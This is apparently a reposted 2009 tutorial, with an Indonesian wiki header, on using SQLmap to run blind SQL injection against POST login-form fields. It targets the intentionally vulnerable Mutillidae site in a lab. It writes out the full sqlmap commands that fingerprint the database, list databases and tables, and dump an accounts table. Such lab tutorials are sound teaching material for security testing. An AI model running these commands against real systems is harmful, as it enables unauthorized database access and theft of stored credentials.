View source for SQLMap: Blind SQL injection untuk POST vars

Sumber: http://www.omgsecurity.com/2009/06/blind-sql-injection-of-post-vars-with-sqlmap/


There are many How-To’s on SQL injection, but I thought I would add to the list with a quick tutorial on how to use SQLmap to automate blind SQLinjection on form POST variables. Most of the tutorials focus on injecting on GET variables within the URL.

List of tools used for this demonstration (configuration of these tools is outside the scope of this tutorial)

Running on Target System

    XAMPP (All-in-one Web Server and Database Server with PHP)
    Mutillidae (Purposely insecure PHP site created by Irongeek)

Running on Attacker’s System

    Backtrack 4 Beta (Linux Distro for Pentesters)
    ParosProxy (Web proxy program for examining web traffic) Installed on Backtrack 4
    SQLmap 0.6-rc5 (Automated SQL injection program) Installed on Backtrack 4

**Before you begin make sure you have ParosProxy running and your web browser pointing to it**

The first thing we do is browse to the site. I will be testing the login form on the login.php page.

img1

Before we login, lets look at the source code for the login form.

img2

As you can see there are three input variables: user_name, password, and submit_button.

We also notice the method is POST (which is why we are using it for this example).

Now you can login. I will use the admin account to login. You could use any account though.

Username: admin

Password: adminpass

It isn’t really that necessary to log into the site, but I want to show you the POST variables as they are passed to the server within ParosProxy. Also, for this particular exercise, you will have to provide a valid username and password for the injection to work correctly in SQLmap. So, you might as well make sure it works. Again you don’t have to use the admin account, you could even register a user first and then use that account.

img3

And the page that tells me I have logged in successfully.

img4

Ok, now the we have successfully logged into the site, lets check Paros to see how that data was sent via the POST method.

img5

As you can see the format of the post variables is as follows:
user_name=admin&password=adminpass&Submit_button=Submit
OK, now fireup sqlmap from a terminal. To make sqlmap check POST variables you need to specify the --method "POST" switch followed by the --data switch.

Here is the whole command for this example (notice how the POST data from Paros is supplied directly to the “–data” switch):
python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit"
img6

It worked. sqlmap detected the remote database server is MySQL ver. 5.X.X

That is pretty much it, but just for fun lets enumerate some of the data. Lets check to see who the current user is:
python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit" --current-user
img7

Alright! running as root…that is convenient. Let’s see the databases:
python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit" --dbs
img8

OK, lets check out “owasp10″ since that is the database for the mutillidae website:
python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit" --tables -D owasp10
img9

Ooo…the “accounts” table looks interesting let’s get the data:
python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit" -D owasp10 -T accounts --dump
img10

Well there you have it. I hope you have found some of this tutorial interesting. And perhaps if you were curious on how to perform automated blind sqlinjection on POST variables, this sheds a little light on it.






==Referensi==

* http://www.omgsecurity.com/2009/06/blind-sql-injection-of-post-vars-with-sqlmap/